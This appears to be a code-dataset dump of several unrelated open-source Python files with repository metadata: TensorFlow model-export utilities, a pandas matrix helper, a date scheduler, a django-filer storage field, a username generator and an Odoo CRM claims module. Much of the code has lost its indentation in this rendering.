if not (isinstance(tensor, ops.Tensor)
or isinstance(tensor, sparse_tensor.SparseTensor)):
raise ValueError(
'feature {} must be a Tensor or SparseTensor.'.format(name))
if receiver_tensors is None:
raise ValueError('receiver_tensors must be defined.')
if not isinstance(receiver_tensors, dict):
receiver_tensors = {_SINGLE_RECEIVER_DEFAULT_NAME: receiver_tensors}
for name, tensor in receiver_tensors.items():
if not isinstance(name, six.string_types):
raise ValueError(
'receiver_tensors keys must be strings: {}.'.format(name))
if not isinstance(tensor, ops.Tensor):
raise ValueError(
'receiver_tensor {} must be a Tensor.'.format(name))
if receiver_tensors_alternatives is not None:
if not isinstance(receiver_tensors_alternatives, dict):
raise ValueError(
'receiver_tensors_alternatives must be a dict: {}.'.format(
receiver_tensors_alternatives))
for alternative_name, receiver_tensors_alt in (
six.iteritems(receiver_tensors_alternatives)):
if not isinstance(receiver_tensors_alt, dict):
receiver_tensors_alt = {_SINGLE_RECEIVER_DEFAULT_NAME:
receiver_tensors_alt}
# Updating dict during iteration is OK in this case.
receiver_tensors_alternatives[alternative_name] = (
receiver_tensors_alt)
for name, tensor in receiver_tensors_alt.items():
if not isinstance(name, six.string_types):
raise ValueError(
'receiver_tensors keys must be strings: {}.'.format(name))
if not (isinstance(tensor, ops.Tensor)
or isinstance(tensor, sparse_tensor.SparseTensor)):
raise ValueError(
'receiver_tensor {} must be a Tensor or SparseTensor.'.format(
name))
return super(ServingInputReceiver, cls).__new__(
cls,
features=features,
receiver_tensors=receiver_tensors,
receiver_tensors_alternatives=receiver_tensors_alternatives)
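# Illustrative sketch (not part of the original module): a minimal hand-built
# ServingInputReceiver matching the docstring above. The feature name 'age' and
# the receiver key 'examples' are arbitrary choices for the example.
def _example_serving_input_receiver():
  serialized = array_ops.placeholder(
      dtype=dtypes.string, shape=[None], name='tf_example')
  age = array_ops.placeholder(dtype=dtypes.float32, shape=[None], name='age')
  return ServingInputReceiver(
      features={'age': age},                       # tensors the model consumes
      receiver_tensors={'examples': serialized})   # tensors fed at serving time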
def build_parsing_serving_input_receiver_fn(feature_spec,
default_batch_size=None):
"""Build a serving_input_receiver_fn expecting fed tf.Examples.
Creates a serving_input_receiver_fn that expects a serialized tf.Example fed
into a string placeholder. The function parses the tf.Example according to
the provided feature_spec, and returns all parsed Tensors as features.
Args:
feature_spec: a dict of string to `VarLenFeature`/`FixedLenFeature`.
default_batch_size: the number of query examples expected per batch.
Leave unset for variable batch size (recommended).
Returns:
A serving_input_receiver_fn suitable for use in serving.
"""
def serving_input_receiver_fn():
"""An input_fn that expects a serialized tf.Example."""
serialized_tf_example = array_ops.placeholder(dtype=dtypes.string,
shape=[default_batch_size],
name='input_example_tensor')
receiver_tensors = {'examples': serialized_tf_example}
features = parsing_ops.parse_example(serialized_tf_example, feature_spec)
return ServingInputReceiver(features, receiver_tensors)
return serving_input_receiver_fn
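# Illustrative usage sketch (not part of the original module). The feature
# names, shapes and dtypes in this spec are assumptions chosen for the example.
def _example_parsing_receiver_fn():
  feature_spec = {
      'age': parsing_ops.FixedLenFeature([1], dtypes.float32),
      'query': parsing_ops.VarLenFeature(dtypes.string),
  }
  # The returned fn, when called, creates one string placeholder (fed under the
  # key 'examples') and parses it into the two features above.
  return build_parsing_serving_input_receiver_fn(feature_spec)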
def build_raw_serving_input_receiver_fn(features, default_batch_size=None):
"""Build a serving_input_receiver_fn expecting feature Tensors.
Creates an serving_input_receiver_fn that expects all features to be fed
directly.
Args:
features: a dict of string to `Tensor`.
default_batch_size: the number of query examples expected per batch.
Leave unset for variable batch size (recommended).
Returns:
A serving_input_receiver_fn.
"""
def serving_input_receiver_fn():
"""A serving_input_receiver_fn that expects features to be fed directly."""
receiver_tensors = {}
for name, t in features.items():
shape_list = t.get_shape().as_list()
shape_list[0] = default_batch_size
shape = tensor_shape.TensorShape(shape_list)
# Reuse the feature tensor's op name (t.op.name) for the placeholder,
# excluding the index from the tensor's name (t.name):
# t.name = "%s:%d" % (t.op.name, t._value_index)
receiver_tensors[name] = array_ops.placeholder(
dtype=t.dtype, shape=shape, name=t.op.name)
# TODO(b/34885899): remove the unnecessary copy
# The features provided are simply the placeholders, but we defensively copy
# the dict because it may be mutated.
return ServingInputReceiver(receiver_tensors, receiver_tensors.copy())
return serving_input_receiver_fn
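# Illustrative usage sketch (not part of the original module): feed a feature
# Tensor directly, bypassing tf.Example parsing. The 'pixels' name and shape
# are assumptions for the example.
def _example_raw_receiver_fn():
  pixels = array_ops.placeholder(
      dtype=dtypes.float32, shape=[None, 28, 28], name='pixels')
  # Each feature placeholder is mirrored as a receiver tensor, so callers feed
  # the raw values themselves at serving time.
  return build_raw_serving_input_receiver_fn({'pixels': pixels})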
### Below utilities are specific to SavedModel exports.
def build_all_signature_defs(receiver_tensors,
export_outputs,
receiver_tensors_alternatives=None):
"""Build `SignatureDef`s for all export outputs."""
if not isinstance(receiver_tensors, dict):
receiver_tensors = {_SINGLE_RECEIVER_DEFAULT_NAME: receiver_tensors}
if export_outputs is None or not isinstance(export_outputs, dict):
raise ValueError('export_outputs must be a dict.')
signature_def_map = {}
excluded_signatures = {}
for output_key, export_output in export_outputs.items():
signature_name = '{}'.format(output_key or 'None')
try:
signature = export_output.as_signature_def(receiver_tensors)
signature_def_map[signature_name] = signature
except ValueError as e:
excluded_signatures[signature_name] = str(e)
if receiver_tensors_alternatives:
for receiver_name, receiver_tensors_alt in (
six.iteritems(receiver_tensors_alternatives)):
if not isinstance(receiver_tensors_alt, dict):
receiver_tensors_alt = {_SINGLE_RECEIVER_DEFAULT_NAME:
receiver_tensors_alt}
for output_key, export_output in export_outputs.items():
signature_name = '{}:{}'.format(receiver_name or 'None',
output_key or 'None')
try:
signature = export_output.as_signature_def(receiver_tensors_alt)
signature_def_map[signature_name] = signature
except ValueError as e:
excluded_signatures[signature_name] = str(e)
_log_signature_report(signature_def_map, excluded_signatures)
# The above calls to export_output.as_signature_def should return only
# valid signatures; if there is a validity problem, they raise ValueError,
# which we ignore above. Consequently the call to is_valid_signature here
# should not remove anything else; it's just an extra sanity check.
return {k: v for k, v in signature_def_map.items()
if signature_def_utils.is_valid_signature(v)}
_FRIENDLY_METHOD_NAMES = {
signature_constants.CLASSIFY_METHOD_NAME: 'Classify',
signature_constants.REGRESS_METHOD_NAME: 'Regress',
signature_constants.PREDICT_METHOD_NAME: 'Predict',
}
def _log_signature_report(signature_def_map, excluded_signatures):
"""Log a report of which signatures were produced."""
sig_names_by_method_name = collections.defaultdict(list)
# We'll collect whatever method_names are present, but also we want to make
# sure to output a line for each of the three standard methods even if they
# have no signatures.
for method_name in _FRIENDLY_METHOD_NAMES:
sig_names_by_method_name[method_name] = []
for signature_name, sig in signature_def_map.items():
sig_names_by_method_name[sig.method_name].append(signature_name)
# TODO(b/67733540): consider printing the full signatures, not just names
for method_name, sig_names in sig_names_by_method_name.items():
if method_name in _FRIENDLY_METHOD_NAMES:
method_name = _FRIENDLY_METHOD_NAMES[method_name]
logging.info('Signatures INCLUDED in export for {}: {}'.format(
method_name, sig_names if sig_names else 'None'))
if excluded_signatures:
    logging.info('Signatures EXCLUDED from export because they cannot be '
                 'served via TensorFlow Serving APIs:')
for signature_name, message in excluded_signatures.items():
logging.info('\'{}\' : {}'.format(signature_name, message))
if not signature_def_map:
logging.warn('Export includes no signatures!')
elif (signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY
not in signature_def_map):
logging.warn('Export includes no default signature!')
# When we create a timestamped directory, there is a small chance that the
# directory already exists because another worker is also writing exports.
# In this case we just wait one second to get a new timestamp and try again.
# If this fails several times in a row, then something is seriously wrong.
MAX_DIRECTORY_CREATION_ATTEMPTS = 10
def get_timestamped_export_dir(export_dir_base):
"""Builds a path to a new subdirectory within the base directory.
Each export is written into a new subdirectory named using the
current time. This guarantees monotonically increasing version
numbers even across multiple runs of the pipeline.
The timestamp used is the number of seconds since epoch UTC.
Args:
export_dir_base: A string containing a directory to write the exported
graph and checkpoints.
Returns:
The full path of the new subdirectory (which is not actually created yet).
Raises:
RuntimeError: if repeated attempts fail to obtain a unique timestamped
directory name.
"""
attempts = 0
while attempts < MAX_DIRECTORY_CREATION_ATTEMPTS:
export_timestamp = int(time.time())
export_dir = os.path.join(
compat.as_bytes(export_dir_base),
compat.as_bytes(str(export_timestamp)))
if not gfile.Exists(export_dir):
# Collisions are still possible (though extremely unlikely): this
# directory is not actually created yet, but it will be almost
# instantly on return from this function.
return export_dir
time.sleep(1)
attempts += 1
logging.warn(
'Export directory {} already exists; retrying (attempt {}/{})'.format(
export_dir, attempts, MAX_DIRECTORY_CREATION_ATTEMPTS))
raise RuntimeError('Failed to obtain a unique export directory name after '
'{} attempts.'.format(MAX_DIRECTORY_CREATION_ATTEMPTS))
def get_temp_export_dir(timestamped_export_dir):
"""Builds a directory name based on the argument but starting with 'temp-'.
This relies on the fact that TensorFlow Serving ignores subdirectories of
the base directory that can't be parsed as integers.
Args:
timestamped_export_dir: the name of the eventual export directory, e.g.
/foo/bar/<timestamp>
Returns:
A sister directory prefixed with 'temp-', e.g. /foo/bar/temp-<timestamp>.
"""
(dirname, basename) = os.path.split(timestamped_export_dir)
temp_export_dir = os.path.join(
compat.as_bytes(dirname),
compat.as_bytes('temp-{}'.format(basename)))
return temp_export_dir
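# A minimal usage sketch, assuming '/tmp/my_model_exports' as an example base
# path: the two helpers above are typically combined so that a partially
# written export never appears under its final, timestamped name.
#
#   export_dir = get_timestamped_export_dir('/tmp/my_model_exports')
#   temp_export_dir = get_temp_export_dir(export_dir)
#   # ... write the SavedModel into temp_export_dir ...
#   gfile.Rename(temp_export_dir, export_dir)  # publish under the final name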
|
dyoung418/tensorflow
|
tensorflow/python/estimator/export/export.py
|
Python
|
apache-2.0
| 14,219
| 0.005767
|
__author__ = 'thor'
import ut as ms
import pandas as pd
import ut.pcoll.order_conserving
from functools import reduce
class SquareMatrix(object):
def __init__(self, df, index_vars=None, sort=False):
if isinstance(df, SquareMatrix):
    # Rebinding ``self`` has no effect on the object being constructed,
    # so copy the attributes of the given SquareMatrix instead.
    self.df = df.df.copy()
    self.index_vars = list(df.index_vars)
    self.value_vars = list(df.value_vars)
elif isinstance(df, pd.DataFrame):
self.df = df
self.index_vars = index_vars
self.value_vars = ms.pcoll.order_conserving.setdiff(list(self.df.columns), self.index_vars)
self.df = self.df[self.index_vars + self.value_vars]
else:
raise NotImplementedError("This case hasn't been implemented yet")
if sort:
self.df.sort(columns=self.index_vars, inplace=True)
def copy(self):
return SquareMatrix(df=self.df.copy(), index_vars=self.index_vars)
def transpose(self):
return SquareMatrix(df=self.df, index_vars=[self.index_vars[1], self.index_vars[0]])
def reflexive_mapreduce(self, map_fun, reduce_fun=None, broadcast_functions=True):
df = self.df.merge(self.df, how='inner', left_on=self.index_vars[1],
right_on=self.index_vars[0], suffixes=('', '_y'))
df[self.index_vars[1]] = df[self.index_vars[1] + '_y']
df.drop(labels=[self.index_vars[0] + '_y', self.index_vars[1] + '_y'], axis=1, inplace=True)
if not isinstance(map_fun, dict) and broadcast_functions:
map_fun = dict(list(zip(self.value_vars, [map_fun] * len(self.value_vars))))
for k, v in map_fun.items():
df[k] = v(df[k], df[k + '_y'])
df.drop(labels=[x + '_y' for x in self.value_vars], axis=1, inplace=True)
if not reduce_fun:
reduce_fun = dict()
for k, v in map_fun.items():
    # Bind v per iteration; a plain closure would capture only the
    # last value of v once the loop has finished.
    reduce_fun[k] = lambda x, v=v: reduce(v, x)
elif not isinstance(reduce_fun, dict) and broadcast_functions:
reduce_fun = dict(list(zip(self.value_vars, [reduce_fun] * len(self.value_vars))))
df = df.groupby(self.index_vars).agg(reduce_fun).reset_index(drop=False)
return SquareMatrix(df=df, index_vars=self.index_vars)
def reverse_indices(self):
return [self.index_vars[1], self.index_vars[0]]
def sort(self, **kwargs):
kwargs = dict({'columns': self.index_vars}, **kwargs)
sm = self.copy()
sm.df = sm.df.sort(**kwargs)
return sm
def __str__(self):
return self.df.__str__()
def __repr__(self):
return self.df.set_index(self.index_vars).__str__()
def head(self, num_of_rows=5):
return self.df.head(num_of_rows)
def tail(self, num_of_rows=5):
return self.df.tail(num_of_rows)
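# A minimal usage sketch, assuming a toy pairwise-distance DataFrame; the
# column names 'from', 'to' and 'dist' are illustrative only.
#
#   df = pd.DataFrame({'from': ['a', 'a', 'b', 'b'],
#                      'to':   ['a', 'b', 'a', 'b'],
#                      'dist': [0.0, 1.0, 1.0, 0.0]})
#   sm = SquareMatrix(df, index_vars=['from', 'to'])
#   # Self-join the matrix with itself: add distances along two-hop paths
#   # and keep the smallest total per (from, to) pair.
#   two_hop = sm.reflexive_mapreduce(lambda x, y: x + y, reduce_fun=min)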
|
thorwhalen/ut
|
daf/struct.py
|
Python
|
mit
| 2,689
| 0.003719
|
from datetime import date, timedelta
INITIAL_OFFSET = timedelta(days=5)
class IntervalException(Exception):
"""
Exception to be raised when the interval behaves
weirdly - i.e. not as a proper interval
"""
def get_dates_for_timedelta(interval_delta, start=None, stop=None,
skip_weekend=False):
"""
For given interval_delta it will return list of dates starting from
``starting date``
:param interval_delta: interval_delta instance
:type interval_delta: datetime.timedelta
:param start: starting point of the interval
:type start: date
:param stop: when to stop
:param skip_weekend: don't place dates at weekends
:return: [datetime objects]
"""
if start is None:
start = date.today()
if stop is None:
stop = start + timedelta(days=365)
dates = [start]
while dates[-1] + interval_delta <= stop:
increased_date = dates[-1] + interval_delta
if skip_weekend and increased_date.isoweekday() > 5:
increased_date += timedelta(days=2)
if increased_date == dates[-1]:
raise IntervalException(interval_delta)
dates.append(increased_date)
return dates
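# A minimal usage sketch; the concrete dates below are illustrative only.
#
#   get_dates_for_timedelta(timedelta(days=14),
#                           start=date(2017, 1, 2),
#                           stop=date(2017, 2, 28),
#                           skip_weekend=True)
#   # -> five dates a fortnight apart, starting on Monday 2017-01-02;
#   #    since every step lands on a Monday, skip_weekend never fires here.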
|
WebArchivCZ/Seeder
|
Seeder/harvests/scheduler.py
|
Python
|
mit
| 1,219
| 0.00082
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import base64
import hashlib
import warnings
from io import BytesIO
from django.core.files.base import ContentFile
from django.utils import six
from easy_thumbnails import fields as easy_thumbnails_fields
from easy_thumbnails import files as easy_thumbnails_files
from .. import settings as filer_settings
from ..utils.filer_easy_thumbnails import ThumbnailerNameMixin
STORAGES = {
'public': filer_settings.FILER_PUBLICMEDIA_STORAGE,
'private': filer_settings.FILER_PRIVATEMEDIA_STORAGE,
}
THUMBNAIL_STORAGES = {
'public': filer_settings.FILER_PUBLICMEDIA_THUMBNAIL_STORAGE,
'private': filer_settings.FILER_PRIVATEMEDIA_THUMBNAIL_STORAGE,
}
THUMBNAIL_OPTIONS = {
'public': filer_settings.FILER_PUBLICMEDIA_THUMBNAIL_OPTIONS,
'private': filer_settings.FILER_PRIVATEMEDIA_THUMBNAIL_OPTIONS,
}
def generate_filename_multistorage(instance, filename):
if instance.is_public:
upload_to = filer_settings.FILER_PUBLICMEDIA_UPLOAD_TO
else:
upload_to = filer_settings.FILER_PRIVATEMEDIA_UPLOAD_TO
if callable(upload_to):
return upload_to(instance, filename)
else:
return upload_to
class MultiStorageFieldFile(ThumbnailerNameMixin,
easy_thumbnails_files.ThumbnailerFieldFile):
def __init__(self, instance, field, name):
"""
This is a little weird, but I couldn't find a better solution.
Thumbnailer.__init__ is called first for proper object initialization.
Then we override some attributes defined at runtime with properties.
We cannot simply call super().__init__ because filer Field objects
don't have a storage attribute.
"""
easy_thumbnails_files.Thumbnailer.__init__(self, None, name)
self.instance = instance
self.field = field
self._committed = True
self.storages = self.field.storages
self.thumbnail_storages = self.field.thumbnail_storages
self.thumbnail_options = self.field.thumbnail_options
self.storage = self._storage
self.source_storage = self._source_storage
self.thumbnail_storage = self._thumbnail_storage
self.thumbnail_basedir = self._thumbnail_base_dir
@property
def _storage(self):
if self.instance.is_public:
return self.storages['public']
else:
return self.storages['private']
@property
def _source_storage(self):
if self.instance.is_public:
return self.storages['public']
else:
return self.storages['private']
@property
def _thumbnail_storage(self):
if self.instance.is_public:
return self.thumbnail_storages['public']
else:
return self.thumbnail_storages['private']
@property
def _thumbnail_base_dir(self):
if self.instance.is_public:
return self.thumbnail_options['public'].get('base_dir', '')
else:
return self.thumbnail_options['private'].get('base_dir', '')
def save(self, name, content, save=True):
content.seek(0) # Ensure we upload the whole file
super(MultiStorageFieldFile, self).save(name, content, save)
class MultiStorageFileField(easy_thumbnails_fields.ThumbnailerField):
attr_class = MultiStorageFieldFile
def __init__(self, verbose_name=None, name=None,
storages=None, thumbnail_storages=None, thumbnail_options=None, **kwargs):
if 'upload_to' in kwargs: # pragma: no cover
upload_to = kwargs.pop("upload_to")
if upload_to != generate_filename_multistorage:
warnings.warn("MultiStorageFileField can handle only File objects;"
"%s passed" % upload_to, SyntaxWarning)
self.storages = storages or STORAGES
self.thumbnail_storages = thumbnail_storages or THUMBNAIL_STORAGES
self.thumbnail_options = thumbnail_options or THUMBNAIL_OPTIONS
super(easy_thumbnails_fields.ThumbnailerField, self).__init__(
verbose_name=verbose_name, name=name,
upload_to=generate_filename_multistorage,
storage=None, **kwargs)
def value_to_string(self, obj):
value = super(MultiStorageFileField, self).value_to_string(obj)
if not filer_settings.FILER_DUMP_PAYLOAD:
return value
try:
payload_file = BytesIO(self.storage.open(value).read())
sha = hashlib.sha1()
sha.update(payload_file.read())
if sha.hexdigest() != obj.sha1:
warnings.warn('The checksum for "%s" diverges. Check for file consistency!' % obj.original_filename)
payload_file.seek(0)
encoded_string = base64.b64encode(payload_file.read()).decode('utf-8')
return value, encoded_string
except IOError:
warnings.warn('The payload for "%s" is missing. No such file on disk: %s!' % (obj.original_filename, self.storage.location))
return value
def to_python(self, value):
if isinstance(value, list) and len(value) == 2 and isinstance(value[0], six.text_type):
filename, payload = value
try:
payload = base64.b64decode(payload)
except TypeError:
pass
else:
if self.storage.exists(filename):
self.storage.delete(filename)
self.storage.save(filename, ContentFile(payload))
return filename
return value
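# A rough sketch of the dump/load round trip implemented by value_to_string
# and to_python above, assuming FILER_DUMP_PAYLOAD is enabled; 'example.jpg'
# is an illustrative filename.
#
#   value_to_string(obj)
#       # -> ('example.jpg', '<base64-encoded payload>')
#   to_python(['example.jpg', '<base64-encoded payload>'])
#       # -> decodes the payload, (re)writes 'example.jpg' through the
#       #    storage backend and returns the filename for the field.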
|
jakob-o/django-filer
|
filer/fields/multistorage_file.py
|
Python
|
bsd-3-clause
| 5,617
| 0.001068
|
import string
from random import choice
from django.contrib.auth.models import User
def get_random_id():
valid_id = False
test_name = 'EMPTY'
while valid_id is False:
s1 = ''.join([choice(string.ascii_uppercase) for i in range(2)])
s2 = ''.join([choice(string.digits) for i in range(8)])
test_name = u'%s%s' % (s1,s2)
try:
User.objects.get(username=test_name)
except User.DoesNotExist:
valid_id = True
return test_name
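# A minimal usage sketch; the value shown is purely illustrative since the
# result is random.
#
#   get_random_id()
#   # -> 'QX39214805'  (two uppercase letters followed by eight digits,
#   #                   guaranteed not to collide with an existing username)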
|
pocketone/django-shoppy
|
shoppy/util/randomuserid.py
|
Python
|
bsd-3-clause
| 499
| 0.012024
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-today OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import openerp
from openerp import models, fields, api
from openerp.addons.crm import crm
from openerp.osv import fields, osv
from openerp import tools
from openerp.tools.translate import _
from openerp.tools import html2plaintext
from datetime import datetime, timedelta
import logging
_logger = logging.getLogger(__name__)
AVAILABLE_ACTIONS = [
('correction','Corrective Action'),
('prevention','Preventive Action'),
('replace','Replace Action'), # New option
('discard','Discard Action'), # New option
]
class crm_claim(osv.osv):
_name = "crm.claim"
_inherit = "crm.claim"
_columns = {
'origin': fields.char('Origin',size=30,readonly=True),
'products_id': fields.many2many('product.product', 'crm_claim_products', 'crm_claim_id', 'product_id', 'Productos', track_visibility='onchange'),
'has_check_solution': fields.boolean('has check solution', readonly=True),
'type_action': fields.selection(AVAILABLE_ACTIONS, 'Action Type',readonly=True), # Override required and selections
'type_id': fields.many2one('crm.claim.type', 'Type'),
#'product_id' : fields.Many2one('product.product'),
#'ref': fields.reference('Reference', selection=openerp.addons.base.res.res_request.referencable_models),
}
_defaults = {
'origin': lambda self, cr, uid, context: 'self',
}
def create(self, cr, uid, vals, context=None):
if not 'number_id' in vals or vals['number_id'] == '/':
if not 'origin' in vals :
vals['origin'] = 'self'
vals['number_id'] = vals['origin'] + str(self.pool.get('ir.sequence').get(cr, uid, 'crm.claim'))
#vals['number_id'] = vals['origin'] + str(self.pool.get('ir.sequence').get(cr, uid, 'crm.claim'))
return super(crm_claim, self).create(cr, uid, vals, context)
def write(self, cr, uid, ids, vals, context=None):
if 'stage_id' in vals:
clm_stg = self.pool.get('crm.claim.stage')
stage=clm_stg.read(cr, uid, vals['stage_id'], ['user_id','day_to_action_next','action_next','days_to_date_deadline'])
if 'action_next' in stage and stage['action_next']:
vals['action_next']=stage['action_next']
vals['date_action_next']=datetime.today()+timedelta(days=int(stage['day_to_action_next']))
vals['user_id']=stage['user_id'][0]
if 'days_to_date_deadline' in stage and stage['days_to_date_deadline']:
vals['date_deadline']=datetime.today()+timedelta(days=int(stage['days_to_date_deadline']))
return super(crm_claim, self).write(cr, uid, ids, vals, context=context)
def copy(self, cr, uid, _id, default={}, context=None):
default.update({
'number_id': self.pool.get('ir.sequence').get(cr, uid, 'crm.claim'),
})
return super(crm_claim, self).copy(cr, uid, _id, default, context)
crm_claim()
class crm_claim_stage(osv.osv):
_name = "crm.claim.stage"
_inherit = "crm.claim.stage"
_columns = {
'user_id': fields.many2one('res.users', 'Responsible', track_visibility='always'),
'day_to_action_next': fields.integer('Days to next action'),
'action_next': fields.char('Next Action'),
'days_to_date_deadline': fields.char('Date to deadline'),
}
_defaults = {
'day_to_action_next': lambda self, cr, uid, context: 7,
}
crm_claim_stage()
class crm_claim_type(osv.osv):
""" Type of Claim """
_name = "crm.claim.type"
_description = "Type of Claim"
_columns = {
'name': fields.char('Name', required=True, translate=True),
'parent_id': fields.many2one('crm.claim.type', 'Type of claim', required=False, ondelete='cascade',
help="Claim type."),
}
"""def _find_object_id(self, cr, uid, context=None):
context = context or {}
object_id = context.get('object_id', False)
ids = self.pool.get('ir.model').search(cr, uid, ['|', ('id', '=', object_id), ('model', '=', context.get('object_name', False))])
return ids and ids[0] or False
_defaults = {
'object_id': _find_object_id
}"""
class claim_from_invoice(osv.osv_memory):
_name = 'claim.from.invoice'
_description = 'claim from invoice'
_columns = {
'invoice_line' : fields.one2many('account.invoice.line', 'invoice_id', string='Invoice Lines'),
}
def claim_from_invoice(self, cr, uid, ids, context=None):
_logger.info("filoquin ----- ids : %r", ids)
class view_account_invoice_claims(osv.osv):
_name = "view.account.invoice.claims"
_description = "Claim by account invoice"
_auto = False
_columns = {
'id': fields.integer('ID', readonly=True),
'invoice_id': fields.many2one('account.invoice', 'Invoice'),
'partner_id': fields.many2one('res.partner', 'Partner'),
'number': fields.char('number'),
'name': fields.char('name'),
'claim_id': fields.many2one('crm.claim', 'Claim'),
'crm_claim_name': fields.char('Subject'),
'invoice_line' : fields.one2many('account.invoice.line', 'invoice_id', string='Invoice Lines'),
#'invoice_line_text_line':fields.function('get_text_lines', store=False,relation='view.account.invoice.claims' ,
# method=True, string='lines',type='char')
'invoice_line_text': fields.char(compute='_get_text_lines' ,store=False, string="Productos"),
}
@api.depends('invoice_line_text','invoice_line')
def _get_text_lines(self):
_logger.info("filoquin ----- self : %r", self)
for record in self:
record.invoice_line_text ='sada'
def prueba(self, cr, uid,ids, context=None):
_logger.info("filoquin ----- ids : %r", ids)
_logger.info("filoquin ----- context : %r", context)
def _get_default_warehouse(self, cr, uid, context=None):
user_obj = self.pool.get('res.users')
user = user_obj.browse(cr, uid, uid, context=context)
company_id = user.company_id.id
wh_obj = self.pool.get('stock.warehouse')
wh_ids = wh_obj.search(cr, uid,
[('company_id', '=', company_id)],
context=context)
if not wh_ids:
raise osv.except_osv(
_('Error!'),
_('There is no warehouse for the current user\'s company.'))
return wh_ids[0]
def create(self, cr, uid, vals, context=None):
_logger.info("filoquin ----- create : %r", vals)
#newclaim = self.newclaim(cr, uid, [vals['invoice_id']], context=None)
#_logger.info("filoquin ----- newclaim : %r", newclaim)
pass
def write(self, cr, uid, vals, context=None):
_logger.info("filoquin ----- write : %r", vals)
pass
def newclaim(self, cr, uid, ids, context=None):
res_invoice_id = ids[0]
claims = self.pool.get('crm.claim').search(cr,uid,
[('invoice_id', '=', res_invoice_id)],
context=context)
if claims :
return self.open_claim(cr, uid, claims[0], context=context)
user_obj = self.pool.get('res.users')
user = user_obj.browse(cr, uid, uid, context=context)
invoice = self.pool.get('account.invoice').browse(cr, uid, res_invoice_id, context=context)
new_claim={'invoice_id': res_invoice_id,
'number_id' : '/',
'partner_id': invoice.partner_id.id,
'email_from': invoice.partner_id.email,
'partner_phone': invoice.partner_id.phone,
'claim_type': 'customer',
'company_id': user.company_id.id,
'name': 'prueba ' }
claim_line_ids = self.add_lines(cr, uid, res_invoice_id, new_claim['claim_type'], datetime.now(),
new_claim['company_id'],context=context)
new_claim['claim_line_ids']=[(6,0,claim_line_ids)]
return_id = self.pool.get('crm.claim').create(cr,uid,new_claim)
return self.open_claim(cr, uid, return_id, context=context)
def add_lines(self,cr, uid, invoice_id, claim_type, claim_date, company_id, context=None):
invoice_line_obj = self.pool.get('account.invoice.line')
invoice_obj = self.pool.get('account.invoice')
product_obj = self.pool['product.product']
claim_line_obj = self.pool.get('claim.line')
company_obj = self.pool['res.company']
warehouse_obj = self.pool['stock.warehouse']
invoice_line_ids = invoice_line_obj.search(
cr, uid,
[('invoice_id', '=', invoice_id)],
context=context)
claim_lines = []
value = {}
warehouse_id = self._get_default_warehouse(cr, uid,
context=context)
invoice_lines = invoice_line_obj.browse(cr, uid, invoice_line_ids,
context=context)
def warranty_values(invoice, product):
values = {}
try:
warranty = claim_line_obj._warranty_limit_values(
cr, uid, [], invoice,
claim_type, product,
claim_date, context=context)
except (InvoiceNoDate, ProductNoSupplier):
# we don't mind at this point if the warranty can't be
# computed and we don't want to block the user
values.update({'guarantee_limit': False, 'warning': False})
else:
values.update(warranty)
company = company_obj.browse(cr, uid, company_id, context=context)
warehouse = warehouse_obj.browse(cr, uid, warehouse_id,
context=context)
warranty_address = claim_line_obj._warranty_return_address_values(
cr, uid, [], product, company,
warehouse, context=context)
values.update(warranty_address)
return values
for invoice_line in invoice_lines:
location_dest_id = claim_line_obj.get_destination_location(
cr, uid, invoice_line.product_id.id,
warehouse_id, context=context)
line = {
'name': invoice_line.name,
'claim_origine': "none",
'invoice_line_id': invoice_line.id,
'product_id': invoice_line.product_id.id,
'product_returned_quantity': invoice_line.quantity,
'unit_sale_price': invoice_line.price_unit,
'location_dest_id': location_dest_id,
'state': 'draft',
}
line.update(warranty_values(invoice_line.invoice_id,invoice_line.product_id))
line_id=self.pool.get('claim.line').create(cr, uid,line)
claim_lines.append(line_id)
return claim_lines
def open_claim(self, cr, uid, claim_id, context=None):
ir_model_data = self.pool.get('ir.model.data')
form_res = ir_model_data.get_object_reference(cr, uid, 'crm_claim', 'crm_case_claims_form_view')
form_id = form_res and form_res[1] or False
tree_res = ir_model_data.get_object_reference(cr, uid, 'crm_claim', 'crm_case_claims_tree_view')
tree_id = tree_res and tree_res[1] or False
return {
'name': _('Invoice Claim'),
'view_type': 'form',
'view_mode': 'form,tree',
'res_model': 'crm.claim',
'res_id': claim_id,
'view_id': False,
'target' : 'inline',
'views': [(form_id, 'form'), (tree_id, 'tree')],
'type': 'ir.actions.act_window',
}
def view_account_invoice_claims(self, cr, uid, ids, context=None):
invoice_ids = context['active_ids']
_logger.info("filoquin ----- domain : %r", invoice_ids)
if len(invoice_ids) == 0:
    raise osv.except_osv(_('Error!'), _("You should select at least one invoice!!!"))
res_invoice = self.read(cr, uid, ids, ['invoice_id'])
if not res_invoice[0]['invoice_id']:
    raise osv.except_osv(_('Error!'), _("You should select at least one invoice!!!"))
res_invoice_id = res_invoice[0]['invoice_id'][0]
invoice = self.pool.get('account.invoice').browse(cr, uid, res_invoice_id, context=context)
new_claim={'invoice_id': res_invoice_id,
'partner_id': invoice.partner_id.id,
'email_from': invoice.partner_id.email,
'partner_phone': invoice.partner_id.phone}
return_id = self.pool.get('crm.claim').write(cr,uid,invoice_ids,new_claim)
return {}
def init(self, cr):
tools.sql.drop_view_if_exists(cr, 'view_account_invoice_claims')
cr.execute("""
create or replace view view_account_invoice_claims as (
select ai.id,ai.id as invoice_id, ai.partner_id , ai.number , ai.name ,cl.id as claim_id, cl.name as crm_claim_name ,
'-' as invoice_line_text
from account_invoice ai
left join crm_claim cl on (ai.id=cl.invoice_id)
)
""")
|
blancoamor/crm_rma_blancoamor
|
crm_rma_blancoamor.py
|
Python
|
agpl-3.0
| 14,539
| 0.008941
|
##############################################################################
# Copyright (c) 2017, Los Alamos National Security, LLC
# Produced at the Los Alamos National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
